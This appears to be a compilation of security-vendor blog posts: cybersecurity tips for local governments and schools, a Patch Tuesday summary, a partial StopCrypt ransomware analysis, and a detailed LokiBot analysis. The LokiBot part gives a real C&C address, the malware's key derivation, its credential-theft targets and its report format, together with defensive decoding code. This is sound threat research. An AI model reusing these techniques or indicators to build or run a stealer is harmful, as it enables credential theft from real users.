A robust risk mitigation policy includes the understanding that cyber liability insurance is increasingly essential. Policies covering privacy liability, network interruption, and errors and omissions provide financial safeguards and peace of mind during a data breach. But do your homework — the requirements and costs of these policies continue to snowball.

4. Thoroughly Assess Your Processes

Commit to periodically evaluating your organization’s cybersecurity posture and training efforts. Initiating your cybersecurity journey requires a thorough review. This assessment helps uncover critical gaps and provides a baseline for future progress monitoring.

Expensive external evaluations aren’t always necessary: Free resources such as the Department of Homeland Security’s Infrastructure Survey Tool and Cyber Resilience Review offer valuable insights and can help you identify and document the cyber resilience of a facility. The CISA Cybersecurity Evaluation Tool (CSET) is a user-friendly desktop application that can help you assess the security posture of your cyber systems and networks.

5. Stick to the Basics

Simple, tried-and-true measures can significantly fortify your defenses. Regular software updates — preferably automated — are fundamental, and having secure backups of sensitive digital and physical files is crucial. Follow cybersecurity leaders when it comes to best practices for password protection. Set a firm cybersecurity policy for all organization members (from leadership to staff) to ensure that all personnel follow policy and that their connected devices comply with standard security methods like data encryption and multi-factor authentication (MFA).

6. Train, Retrain and Train Some More

In the report “Cost of a Data Breach,” the Ponemon Institute highlights human error as a leading cause of network security breaches. Periodic comprehensive staff training in cybersecurity is non-negotiable, ensuring every organization member can identify, mitigate and respond effectively to threats. It’s critical to tell them, tell them again, and then tell them what you told them. Adopt a mindset that cybersecurity is everyone’s business.

7. Offer Internships

The cybersecurity skills gap continues to be a concern — specifically, expertise in cloud computing, zero trust and AI/machine learning. States and municipalities have a unique collaboration opportunity with local colleges, universities and nonprofits that can offset the financial burden of enhancing cybersecurity infrastructure. For instance, contact a local college or university for young talent who want real-world experience outside the classroom. Here’s your opportunity to build partnerships that can yield technical assistance and build relationships in the community, while also nurturing future industry talent.

8. Keep Up

Cybersecurity is not a one-and-done issue. It’s constantly evolving based on factors ranging from law enforcement activity to technological advancements. Hackers now work in semi-corporate environments with access to shared (and often paid) services to extend their reach.

As we build out AI for its societal benefits, cybercriminals are implementing AI to drive breach activity. To help you stay informed, pick a handful of government resources, journals and bloggers like SonicWall’s network security experts to help you keep up to date in this rapidly moving threat environment.

9. Outsource SecOps

Outsourcing is an option for your high-level cybersecurity operations and deployments. A recent survey by the ICMA (International City/County Management Association) on the state of cybersecurity in municipalities in the United States found that more than half (about 50.9%) of local governments are now outsourcing many cybersecurity operations.

Why outsource? Nurturing and maintaining in-house specialized skills is complex and can be cost prohibitive. SonicWall’s partner network encompasses hundreds of professionally trained Managed Service Providers (MSPs) and Managed Security Service Providers (MSSPs) that can assist in developing and rolling out a comprehensive cybersecurity solution. Contact SonicWall’s local government team for assistance in selecting one for your organization.

Next Steps for Cybersecurity

In the dynamic world of cyber threats, local governments must remain vigilant and adaptable. By embracing these best practices and staying abreast of new developments, you can build a robust defense against a spectrum of cyber threats. Enhancing cybersecurity can be daunting — especially for resource-strapped municipalities — but local governments can improve cybersecurity by being proactive, educated and resourceful. This proactive approach is not just about safeguarding data and infrastructure; it’s about protecting the trust and well-being of the communities we serve.

We can tailor a solution for almost any government use case. Contact us to learn more.

5 Strategies for Thoughtful K-12 Network Infrastructure Upgrades

Technology and education haven’t always gone hand in hand. Just a decade ago, many schools had completely banned technologies like smartphones, tablets, laptops and more. But the classrooms of 2024 have done a complete 180: You’d now be hard-pressed to find a classroom that isn’t utilizing some form of tablet or laptop in its curriculum. In these new high-tech classrooms, admins and IT leaders need best practices and strategies for securing classrooms against ever-increasing cyberattacks.

This seismic technological shift has come with a new set of challenges, from making sure students have their tech charged and ready to go each day to securing on-campus and remote networks to make sure students can safely connect from anywhere. Wi-Fi and remote access points are now the primary methods for connection, but despite that, the network infrastructure at many schools still leaves a lot to be desired.

In the past, some schools haven’t undertaken such updates until after network infrastructure is compromised, resulting in both steep financial losses and loss of valuable instruction time. Proactive upgrades to safer, higher-performing technologies are the path forward, and SonicWall is ready to help you make that path easier.

Density Planning

Traditionally, Wi-Fi network planning focused on coverage, but when planning for efficiency, coverage isn’t enough. Even if a classroom’s wireless signal covers the whole area, it may still need help keeping up with the number of devices that students and faculty are using.

School leaders should be planning for the maximum traffic density in each classroom and across the entire campus. This ensures that students, faculty and visitors are always covered, and helps prevent issues caused by low bandwidth. Tools like the SonicWall Wi-Fi Planner can help IT leaders visualize and plan for maximum device density and traffic across their environment.

Embracing Cloud Technology

Many school applications and functions have transitioned to the cloud to save valuable server space and increase access. But managing cloud applications can be difficult and even confusing. Cloud-managed wireless solutions, like SonicWall’s Wi-Fi Cloud Manager (WCM), offer centralized management and easy access through the SonicWall Capture Security Center (CSC).

With WCM and CSC, you can manage tens of thousands of wireless access points and a variety of networks. Cloud App Security (CAS) can be easily deployed in a matter of minutes and leverages machine learning, artificial intelligence and big data analysis to catch email-borne and zero-day attacks that can be easily missed by your cloud provider. CAS stops business email compromise, phishing, malware and account takeover attacks, and even combats against insider threats.

Unified Management System

Deploying so many technologies often means juggling multiple different management software applications, gunking up processes and taking valuable time away from school IT leaders. Choosing to implement a cohesive ecosystem with a unified management system can save money and time while simplifying management. A tool like SonicWall Capture Security Center (CSC) offers a single-pane-of-glass management system, and its unified view of your entire network and real-time analytics enhance network security and efficiency. CSC also streamlines network governance by integrating various security resources into one easy-to-use dashboard.

Content Filtering and Advanced Licensing Implementation

Any time you turn kids loose with internet-connected devices, they’re bound to test the limits of what they can and can’t get away with. Teachers and other faculty don’t have the bandwidth to constantly monitor everything students are doing – but SonicWall’s Content Filtering Service (CFS) does. Content filtering is crucial for all school networks, and provides protection from harmful and inappropriate online content that students may stumble upon. SonicWall’s CFS offers an extensive database for creating custom access policies that enhance online safety.

SonicWall’s Gen 7 next-generation firewalls (NGFWs) also support advanced networking features like SD-WAN, robust content filtering, dynamic routing, high availability and high-speed VPN functionality. Like the other tools we’ve mentioned here, these appliances provide a single-pane-of-glass interface to manage both switches and access points.

Future-proofing with Advanced Technology

Deploying the latest technology not only provides you with the most up-to-date and advanced protection, but it’s also the key to creating a sustainable and efficient network. Schools don’t need to completely overhaul what they have in place right now – they just need to implement thoughtful upgrades to critical components.

Upgrading components such as wireless access points that support the latest standards like multi-gigabit 802.11ax, advanced firewall services, cloud protection and endpoint control helps ensure that your network security is robust, efficient, and equipped to deal with the constantly evolving threat environment that plagues schools today.

Maximizing Impact and Value for K-12 Education

Advanced network solutions are the path forward in K-12, and the educational community as a whole must embrace these solutions in order to provide consistent and accessible digital experiences for students, staff and visitors. Tools like SonicWall’s Capture Security Center (CSC) can ensure the safety of your network in a package that’s easy to manage. And the adoption of 802.11ax for campus Wi-Fi can prepare your infrastructure for future technological advancements.

Beginning this upgrade path now provides benefits both for the present and future, all while fostering a learning environment where technology is seamlessly and safely integrated. The result will be a network that’s efficient and secure, and will be simpler and more cost-effective to upgrade in the future.

LokiBot is Being Distributed by Windows Shortcut Files

Overview

The SonicWall RTDMI™ engine has recently detected Windows Shortcut Files (LNKs) inside archives that execute LokiBot malware on the victim’s machine. The malicious LNK file is packed inside an archive along with a text file that says, “Find attached March Order” in Spanish, so that the archive appears to be a legitimate file. The LNK file executes a PowerShell script to download and execute the LokiBot loader executable from a URL. LokiBot malware has been observed using image steganography, multi-layered packing and Living Off the Land (LOTL) techniques in past campaigns. The malware authors’ trend of using a low-profile file type as an initial vector keeps increasing, and they prefer custom packers and protectors to prevent detection rather than updating the core executable code.

Figure 1: LNK file executing PowerShell to download LokiBot

Loader Executable

The downloaded executable is protected in two layers by the Confuser application to make analysis difficult for reverse engineers. After unpacking and de-obfuscating both layers, the actual code responsible for loading and executing the LokiBot executable is exposed. The LokiBot binary is kept RSA-encrypted and Base64-encoded in the resource section of the loader executable, which is only visible after unpacking.

Figure 2: Encrypted LokiBot executable in the resource of loader executable

To get the RSA key, the malware computes the MD5 of the string “UV?vgotlHR?P\Y?LEhgU]CdJIS?W;yBTkDZw??FTEi>Z” and self-concatenates the MD5 value, overwriting the last byte of the MD5. After Base64 decoding, the malware decrypts the encrypted executable data using the RSA algorithm with the parameters below:

Figure 3: Parameters

Figure 4: Code performing RSA decryption


The decrypted bytes are the string representation of the executable’s hex bytes, and a string-to-hex conversion is performed to finally get the LokiBot executable. The malware executes the LokiBot binary using the CreateProcessW API.

Figure 5: LokiBot binary string representation

LokiBot

LokiBot is an information stealer that has been active in the wild since 2015. It contains a rich list of applications that are used to steal data from the victim’s machine. After sending data to its C&C server, the malware receives commands to perform various actions on the victim’s machine.

Delayed Execution

The execution of LokiBot starts by examining the argument value for space-separated “-u” occurrences. The malware delays its execution by 10000 milliseconds for each occurrence of the value “-u”.

Figure 6: Checks process arguments

API Name Hashing

The malware uses API name hashing and resolves addresses just before invoking the APIs. To make analysis difficult, the malware does not store the resolved API addresses; instead, it calls the API address directly from the accumulator register. If the malware needs to execute the same API more than once, it has to resolve the API address again for each invocation.

Hashing Algorithm

Code representation for the hashing module is in the C language and can be seen below. It generates a DWORD hash for the given array of bytes.

Figure 7: Hashing algorithm

Getting the Load Addresses of DLLs

An array of DLL names with a fixed length of 0x1A for each name is created by the malware. To resolve an API address, the malware calls a function with the index of the DLL names array and API name hash. The name of the DLL is retrieved from the DLL names array using the index value. The malware invokes the LoadLibraryW API to get the load address of the DLL, except for the kernel32 and ntdll DLLs. The malware considers kernel32 and ntdll to be already loaded into the memory and does PEB traversal to find the load address. It does this by comparing the DLL name hash with the loaded module name hashes.

Figure 8: Array of DLL names

Figure 9: Gets DLL load address

Resolving APIs Addresses

After getting the DLL load address either by calling the LoadLibraryW API or by PEB traversal, the malware enumerates the export directory of the loaded DLL and compares the requested API name hash with the exported API name hash to resolve the API address.

Single Instance Execution

The malware retrieves the MachineGUID value from the registry key “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography”, computes its MD5 and uses the string representation of the hash up to the 12th byte as a mutex name. The malware attempts to create the mutex and checks for the error value ERROR_ALREADY_EXISTS, terminating the current execution so that only a single instance of the malware process runs. The mutex value for my system is “06E1A66DB87D112F02F38F7C” and is expected to always be the same for a given system. It is later sent to the Command and Control (C&C) server. The mutex name can help the malware author identify whether a system is reinfected or has been infected for the first time. Some of the character sequences of the mutex name are used by the malware as dropped file names and a directory name.

Figure 10: Creates mutex using machine GUID

If the malware fails to get the mutex name using MachineGUID, then it executes its backup code to compute a random mutex name using the system time.

Figure 11: Code to create an alternative random mutex

Stealing Application Data

The malware steals data from installed applications like browsers, SSH clients, document applications, password managers, email clients and FTP clients. The data it steals includes login credentials, autofill web forms, document texts and more. The malware contains a total of 101 functions to steal data from the installed applications. The malware initializes an array of function pointers with the addresses of the stealing functions and initializes another array with the respective argument values for those functions. The malware then invokes the stealing functions in a loop, calling each from the array of function pointers with the respective argument from the arguments array. The stealer functions keep the stolen data in a structured buffer along with their sizes.

Figure 12: Calling stealing functions

Browsers

The malware contains a list of Chromium-based browsers, Gecko-based browsers and other browsers from which it steals the stored data. For a Gecko-based browser, the malware reads the registry entry for the respective browser to get the installation directory and adds the installation directory to the PATH environment variable so that nss3.dll, which is used to decrypt the Gecko-based browsers’ data, loads cleanly. After decrypting the data, the malware restores the PATH environment variable. The malware reads the profiles.ini file from the browser’s dedicated application data directory to get the list of profile directories. The malware enumerates each profile directory and uses multiple APIs (NSS_Init, GetInternalKeySlot, Authenticate, Decrypt, FreeSlot, FreeItem, CheckUserPassword, NSS_Shutdown) of nss3.dll to decrypt data from the files mentioned below:

  • json
  • js
  • sqlite
  • txt
  • txt

For Chromium-based browsers, the malware steals data from the files “Web Data” and “Login Data” in the respective application data folders for the browsers. For Edge and Internet Explorer, the malware steals data from the Windows Password Manager and the registry entry “Software\Microsoft\Internet Explorer\IntelliForms\Storage2”. The malware enumerates and retrieves credentials from the Windows Password Manager using multiple APIs (VaultEnumerateVaults, VaultOpenVault, VaultEnumerateItems, VaultGetItem, VaultFree, VaultCloseVault) of the library vaultcli.dll.

Chromium-based       | Gecko-based     | Others
Dragon               | Mozilla Firefox | Safari
ChromePlus           | SeaMonkey       | Opera Next
Chrome               | Flock           | Opera Stable
Nichrome             | Black Hawk      | QtWeb
RockMelt             | Cyberfox        | QupZilla
Spark                | IceDragon       | Internet Explorer
Chromium             | K-Meleon        | Opera
Titan Browser        | Lunascape       |
Torch                | Pale Moon       |
YandexBrowser        | Waterfox        |
Epic Privacy Browser |                 |
CocCoc               |                 |
Vivaldi              |                 |
Chromodo             |                 |
Superbird            |                 |
Coowon               |                 |
Mustang Browser      |                 |
360Browser           |                 |
Citrio               |                 |
Chrome SxS           |                 |
Orbitum              |                 |
Iridium              |                 |

Figure 13: List of browsers

Apart from the browsers, the malware steals data from other installed applications which include SSH clients, FTP clients, email applications, document applications, password managers and more, which are mentioned in the table below:

Figure 14: List of applications to steal data

C&C Communication

The malware has an array that can hold four C&C server addresses; however, in current variants, only one unique and valid C&C server address is found. After decrypting the C&C URL, the malware separates the IP address, port number, path and protocol to establish a connection.

Figure 15: Code for C&C communication

The malware compresses the stolen application data using the aPLib compression library and appends it to the structured buffer. The malware then prepares an HTTP POST request with the user-agent “Mozilla/4.08 (Charon; Inferno)” and sends the stolen data to the C&C server. After sending the HTTP POST request, the malware stores the checksum of the data it sent in the file “C:\Users\Deepak\AppData\Roaming\DB87D1\112F02.hdb”. The directory name is taken from the mutex name’s character offsets seven to 12, and the file name from offsets 12 to 17.

Figure 16: Stolen data sent to the C&C server

An explanation of values sent by the malware to the C&C server is mentioned in the table below:

Offset | Size | Field description               | Value
0      | 2    | Version                         | 12
2      | 2    | Information type                | 27
4      | 2    | IsUnicodeFlag                   | 0
6      | 4    | Size of binary ID               | 07
10     | 7    | BinaryID                        | ckav.ru
17     | 2    | IsUnicodeFlag                   | 1
19     | 4    | Size of username                | 12
23     | 12   | Username                        | Deepak (Unicode)
35     | 2    | IsUnicodeFlag                   | 01
37     | 4    | Size of computer name           | 30
41     | 30   | Computer name                   | DESKTOP-HQ11H51 (Unicode)
71     | 2    | IsUnicodeFlag                   | 01
73     | 4    | Size of computer name           | 30
77     | 30   | Computer name                   | DESKTOP-HQ11H51 (Unicode)
107    | 4    | Screen width                    | 780
111    | 4    | Screen height                   | 438
115    | 2    | IsUserAdmin                     | 01
117    | 2    | IsBuiltInAdministrator          | 00
119    | 2    | PROCESSOR_ARCHITECTURE_AMD64    | 01
121    | 2    | OS major version                | 10
123    | 2    | OS minor version                | 00
125    | 2    | Left over                       | 6B
127    | 2    | Related to service pack version | 01
129    | 2    | IsFirstPacketSent               | 00
131    | 2    | Word value 1                    | 00
133    | 2    | Word value 0                    | 00
135    | 2    | Word value 0                    | 00
137    | 2    | Word value 0                    | 00
139    | 4    | Size of stolen data             | 20776
141    | 2    | IsUnicodeFlag                   | 01
145    | 4    | Size of mutex name              | 30
149    | 48   | Mutex name                      | 06E1A66DB87D112F02F38F7C
197    | 4    | Size of random string           | 5
201    | 5    | Random string                   | ytPeE
206    | 4    | Size of compressed data         | 680
210    | 680  | Compressed data                 | 01 E1 48 01 B0 D9…

Figure 17: Description of the data sent to the C&C
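The report layout above is simple to decode from a captured POST body, which is useful when triaging C&C traffic during an incident. The decoder below is an added example (not SonicWall’s code): it reads the fields in the order the table lists them, so each offset is the running total of the previous sizes. It assumes little-endian integers and UTF-16LE for strings whose IsUnicodeFlag is set (neither is stated above), and the sample report is constructed from the table’s values rather than captured from a real infection.

```python
import struct

# Fixed-width WORD fields that follow the two computer-name entries, in the
# order the table above lists them.
WORD_FIELDS = (
    "is_user_admin", "is_builtin_administrator", "processor_architecture_amd64",
    "os_major_version", "os_minor_version", "left_over",
    "service_pack_related", "is_first_packet_sent",
    "word_value_1", "word_value_2", "word_value_3", "word_value_4",
)


class Reader:
    """Sequential little-endian reader over the report bytes (endianness assumed)."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def take(self, n: int) -> bytes:
        if self.pos + n > len(self.data):
            raise ValueError(f"truncated report at offset {self.pos}")
        chunk = self.data[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def u16(self) -> int:
        return struct.unpack("<H", self.take(2))[0]

    def u32(self) -> int:
        return struct.unpack("<I", self.take(4))[0]

    def flagged_string(self) -> str:
        # IsUnicodeFlag (WORD), size in bytes (DWORD), then the string bytes.
        unicode_flag, size = self.u16(), self.u32()
        raw = self.take(size)
        return raw.decode("utf-16-le" if unicode_flag else "ascii")


def decode_report(data: bytes) -> dict:
    """Parse one report in the field order of the table above."""
    r = Reader(data)
    report = {"version": r.u16(), "information_type": r.u16()}
    report["binary_id"] = r.flagged_string()
    report["username"] = r.flagged_string()
    report["computer_name"] = r.flagged_string()
    report["computer_name_repeat"] = r.flagged_string()  # sent twice, as observed
    report["screen_width"], report["screen_height"] = r.u32(), r.u32()
    for name in WORD_FIELDS:
        report[name] = r.u16()
    report["stolen_data_size"] = r.u32()
    report["mutex_name"] = r.flagged_string()
    report["random_string"] = r.take(r.u32()).decode("ascii")  # no unicode flag
    report["compressed_data"] = r.take(r.u32())  # aPLib-packed, left undecoded
    if r.pos != len(data):
        raise ValueError(f"{len(data) - r.pos} trailing bytes after the report")
    return report


def _flagged(text: str, unicode: bool) -> bytes:
    raw = text.encode("utf-16-le" if unicode else "ascii")
    return struct.pack("<HI", int(unicode), len(raw)) + raw


def build_sample_report() -> bytes:
    """Constructed test input reproducing the values in the table (not real traffic)."""
    compressed = bytes.fromhex("01e14801b0d9") + b"\x00" * 674  # 680 bytes in total
    words = [1, 0, 1, 10, 0, 0x6B, 1, 0, 0, 0, 0, 0]
    return (
        struct.pack("<HH", 0x12, 0x27)                 # version, information type
        + _flagged("ckav.ru", False)                   # binary ID
        + _flagged("Deepak", True)                     # username
        + _flagged("DESKTOP-HQ11H51", True) * 2        # computer name, sent twice
        + struct.pack("<II", 780, 438)                 # screen width, screen height
        + struct.pack("<12H", *words)                  # WORD_FIELDS
        + struct.pack("<I", 20776)                     # size of stolen data
        + _flagged("06E1A66DB87D112F02F38F7C", True)   # mutex name
        + struct.pack("<I", 5) + b"ytPeE"              # random string
        + struct.pack("<I", len(compressed)) + compressed
    )
```

Pairing this decoder with a filter on the “Mozilla/4.08 (Charon; Inferno)” user-agent gives a quick way to pull the victim identifiers out of proxy captures.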

After sending the stolen application data, the malware checks to see if the process is running in administrator mode to steal credentials stored in Windows Credential Manager. The malware enumerates files from the directory “%AppData%\Roaming\Microsoft\Credentials” using the APIs FindFirstFileW and FindNextFileW to read the encrypted data which is decrypted by accessing the process memory of lsass.exe.

Figure 18: Encrypted credentials in Windows Credential Manager

Decrypted credentials are compressed using aPLib compression library and appended into the structured buffer after malware variant-specific information and collected system information. It is then sent to the C&C server.

Figure 19: Decrypted credential from Windows Credential Manager

The malware creates the file “%APPDATA%\Roaming\DB87D1\112F02.lck” before attempting to decrypt credentials from Windows Credential Manager and deletes the file once the decryption routine is completed.

Figure 20: Creating the lock file

After sending the stolen data, the malware expects commands from the C&C server and spawns a separate thread to perform actions based on the received command.

Registry Entry

The malware creates a self-copy in the application data folder using a file move operation. If it fails in moving the file, then the malware uses the file copy operation. The malware creates a registry entry “HKCU\http://91.92.252.146:8015/wioy/five/fre.php\DB87D1” and sets the values as the path of the dropped file.

Figure 21: Registry entry
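Because the mutex, the drop directory, the .hdb and .lck file names and the registry value name are all derived from one MD5, a responder can compute the expected artifacts for a given host and hunt for them. The code below is an added example (not SonicWall’s code) covering the mutex derivation and the naming described in the C&C and registry sections above; it assumes the MachineGUID string is hashed as ASCII, which the write-up does not state, and the file inventory it scans is constructed.

```python
import hashlib
import re

GUID_ENCODING = "ascii"  # assumption: the write-up does not say how the GUID string is hashed
EXAMPLE_MUTEX = "06E1A66DB87D112F02F38F7C"  # mutex value reported in the write-up
HEX24 = re.compile(r"[0-9A-F]{24}")
# Drop-file shape under the roaming profile: <6 hex>\<6 hex>.hdb or .lck
DROP_FILE_RE = re.compile(
    r"\\AppData\\Roaming\\[0-9A-F]{6}\\[0-9A-F]{6}\.(?:hdb|lck)$", re.IGNORECASE
)


def mutex_name_from_guid(machine_guid: str) -> str:
    """MD5 of the MachineGUID string, hex-encoded and cut to its first 12 bytes."""
    digest = hashlib.md5(machine_guid.encode(GUID_ENCODING)).hexdigest().upper()
    return digest[:24]


def artifact_names(mutex: str) -> dict:
    """Names LokiBot derives from the mutex: offsets 7..12 -> directory, 12..17 -> file."""
    if not HEX24.fullmatch(mutex):
        raise ValueError("mutex name must be 24 upper-case hex characters")
    directory = mutex[7:13]
    filename = mutex[12:18]
    appdata = "%APPDATA%"  # expands to <profile>\AppData\Roaming
    return {
        "mutex": mutex,
        "directory": "\\".join([appdata, directory]),
        "checksum_file": "\\".join([appdata, directory, filename + ".hdb"]),
        "lock_file": "\\".join([appdata, directory, filename + ".lck"]),
        "registry_value": directory,  # trailing name of the HKCU entry shown in Figure 21
    }


def suspicious_drop_files(paths) -> list:
    """Filter a file inventory for paths shaped like LokiBot's .hdb/.lck drop files."""
    return [p for p in paths if DROP_FILE_RE.search(p)]


# Constructed file inventory for demonstration (not taken from a real host).
SAMPLE_PATHS = [
    r"C:\Users\alice\AppData\Roaming\DB87D1\112F02.hdb",
    r"C:\Users\alice\AppData\Roaming\DB87D1\112F02.lck",
    r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Recent\report.lnk",
    r"C:\Users\alice\AppData\Roaming\vendor\cache.hdb",
]
```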

The malware modifies the attributes of the directory to the following values to lower the visibility:

  • FILE_ATTRIBUTE_HIDDEN
  • FILE_ATTRIBUTE_SYSTEM
  • FILE_ATTRIBUTE_NOT_CONTENT_INDEXED

Figure 22: Modifies directory attributes

The archive file cannot be found in any of the popular threat intelligence sharing portals like VirusTotal and ReversingLabs at the time of writing this blog, which indicates its uniqueness and limited distribution.

Figure 23: File is not available on VirusTotal

Evidence of the detection by our RTDMI engine can be seen below in the Capture ATP report for this file.

Figure 24: Capture report

Microsoft Security Bulletin Coverage for March 2024

Overview

Microsoft’s March 2024 Patch Tuesday has 59 vulnerabilities, 26 of which are Elevation of Privilege. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of March 2024 and has produced coverage for 7 of the reported vulnerabilities.

Vulnerabilities with Detections

CVE            | CVE Title                                                                        | Signature
CVE-2024-21330 | Azure Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability  | ASPY 546 Exploit-py py.MP_4
CVE-2024-21433 | Windows Print Spooler Elevation of Privilege Vulnerability                       | ASPY 549 Exploit-exe exe.MP_372; IPS 1134 GetCMD.dll File Download (SMB)
CVE-2024-21437 | Windows Graphics Component Elevation of Privilege Vulnerability                  | ASPY 547 Exploit-exe exe.MP_370
CVE-2024-26160 | Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability      | ASPY 548 Exploit-exe exe.MP_371
CVE-2024-26170 | Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability | ASPY 552 Exploit-exe exe.MP_374
CVE-2024-26182 | Windows Kernel Elevation of Privilege Vulnerability                              | ASPY 551 Exploit-exe exe.MP_373
CVE-2024-26185 | Windows Compressed Folder Tampering Vulnerability                                | ASPY 550 Malformed-7z 7z.MP_1

Release Breakdown

The vulnerabilities can be classified into the following categories:

For March there are 57 critical, 2 important and zero moderate vulnerabilities.

2024 Patch Tuesday Monthly Comparison

Microsoft tracks vulnerabilities that are being actively exploited at the time of discovery as well as those that have been disclosed publicly before the Patch Tuesday release for each month. The chart above displays these metrics as seen each month.

Release Detailed Breakdown

Denial of Service Vulnerabilities

CVE            | Title
CVE-2024-21392 | .NET and Visual Studio Denial of Service Vulnerability
CVE-2024-21408 | Windows Hyper-V Denial of Service Vulnerability
CVE-2024-21438 | Microsoft AllJoyn API Denial of Service Vulnerability
CVE-2024-26181 | Windows Kernel Denial of Service Vulnerability
CVE-2024-26190 | Microsoft QUIC Denial of Service Vulnerability
CVE-2024-26197 | Windows Standards-Based Storage Management Service Denial of Service Vulnerability

Elevation of Privilege Vulnerabilities

CVE            | Title
CVE-2024-21330 | Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability
CVE-2024-21390 | Microsoft Authenticator Elevation of Privilege Vulnerability
CVE-2024-21400 | Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability
CVE-2024-21418 | Software for Open Networking in the Cloud (SONiC) Elevation of Privilege Vulnerability
CVE-2024-21427 | Windows Kerberos Security Feature Bypass Vulnerability
CVE-2024-21431 | Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability
CVE-2024-21432 | Windows Update Stack Elevation of Privilege Vulnerability
CVE-2024-21433 | Windows Print Spooler Elevation of Privilege Vulnerability
CVE-2024-21434 | Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability
CVE-2024-21436 | Windows Installer Elevation of Privilege Vulnerability
CVE-2024-21437 | Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2024-21439 | Windows Telephony Server Elevation of Privilege Vulnerability
CVE-2024-21442 | Windows USB Print Driver Elevation of Privilege Vulnerability
CVE-2024-21443 | Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-21445 | Windows USB Print Driver Elevation of Privilege Vulnerability
CVE-2024-21446 | NTFS Elevation of Privilege Vulnerability
CVE-2024-26165 | Visual Studio Code Elevation of Privilege Vulnerability
CVE-2024-26169 | Windows Error Reporting Service Elevation of Privilege Vulnerability
CVE-2024-26170 | Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability
CVE-2024-26173 | Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26176 | Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26178 | Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26182 | Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26199 | Microsoft Office Elevation of Privilege Vulnerability
CVE-2024-26201 | Microsoft Intune Linux Agent Elevation of Privilege Vulnerability
CVE-2024-26203 | Azure Data Studio Elevation of Privilege Vulnerability

Information Disclosure Vulnerabilities

CVE            | Title
CVE-2024-21448 | Microsoft Teams for Android Information Disclosure Vulnerability
CVE-2024-26160 | Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability
CVE-2024-26174 | Windows Kernel Information Disclosure Vulnerability
CVE-2024-26177 | Windows Kernel Information Disclosure Vulnerability
CVE-2024-26204 | Outlook for Android Information Disclosure Vulnerability

Remote Code Execution Vulnerabilities

CVE            | Title
CVE-2024-21334 | Open Management Infrastructure (OMI) Remote Code Execution Vulnerability
CVE-2024-21407 | Windows Hyper-V Remote Code Execution Vulnerability
CVE-2024-21411 | Skype for Consumer Remote Code Execution Vulnerability
CVE-2024-21426 | Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-21429 | Windows USB Hub Driver Remote Code Execution Vulnerability
CVE-2024-21430 | Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability
CVE-2024-21435 | Windows OLE Remote Code Execution Vulnerability
CVE-2024-21440 | Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-21441 | Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21444 | Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21450 | Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21451 | Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-26159 | Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-26161 | Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-26162 | Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-26164 | Microsoft Django Backend for SQL Server Remote Code Execution Vulnerability
CVE-2024-26166 | Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-26198 | Microsoft Exchange Server Remote Code Execution Vulnerability

Security Feature Bypass Vulnerabilities

CVE            | Title
CVE-2024-20671 | Microsoft Defender Security Feature Bypass Vulnerability

Spoofing Vulnerabilities

CVE            | Title
CVE-2024-21419 | Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2024-21421 | Azure SDK Spoofing Vulnerability

Tampering Vulnerabilities

CVE            | Title
CVE-2024-26185 | Windows Compressed Folder Tampering Vulnerability

Interesting Multi-Stage StopCrypt Ransomware Variant Propagating in the Wild

Overview

The SonicWall Capture Labs threat research team recently observed an interesting variant of StopCrypt ransomware. The ransomware executes its malicious activities by utilizing multi-stage shellcodes before launching a final payload that contains the file encryption code.

Infection Cycle

At the start of execution, it builds the string “msim32.dll” on the stack and loads that DLL using LoadLibrary. Why it does this is unclear, as the DLL is not used by the process.

It has a long, time-delaying loop of 651,840,312 iterations in which the same data is copied to a location and a counter is incremented. Many similar delay loops are used throughout the malware’s execution.

The possible reason for using such techniques is to evade detection. These loops serve a nefarious purpose: to thwart time-sensitive sandboxes and security mechanisms by artificially prolonging the execution time of the malicious code.

Figure 1:  Loop for delaying time

Next, it allocates the memory using LocalAlloc API, and it then uses VirtualProtect to change the permission of the memory block to READ, WRITE and EXECUTE.

First Stage Payload

In this stage, it dynamically resolves the required APIs using the Kernel_GetProcAddress API.

The ransomware builds the API function names as strings directly on the stack rather than using straightforward API calls, which security tools can easily identify and analyze.

Figure 2: Constructing API names on the stack

The malware resolves the addresses of the following APIs:

  • GlobalAlloc
  • VirtualAlloc
  • SetLastError
  • Sleep
  • CreateToolHelp32Snapshot
  • Module32First
  • CloseHandle

CreateToolhelp32Snapshot is utilized to take a snapshot of the current process that includes all its modules (0x8 = TH32CS_SNAPMODULE):

Figure 3: Kernel32_CreateToolhelp32Snapshot Win32 API call

The Ransomware extracts information about the first module of the process using the Module32First API.

It then calls the VirtualAlloc API to allocate the memory with READ, WRITE and EXECUTE permissions.

Second Stage of Payload

In this stage, the primary task of the shellcode is to perform process hollowing.

API function names are also dynamically created on the stack during this phase.

Figure 4: Constructing API names on the stack

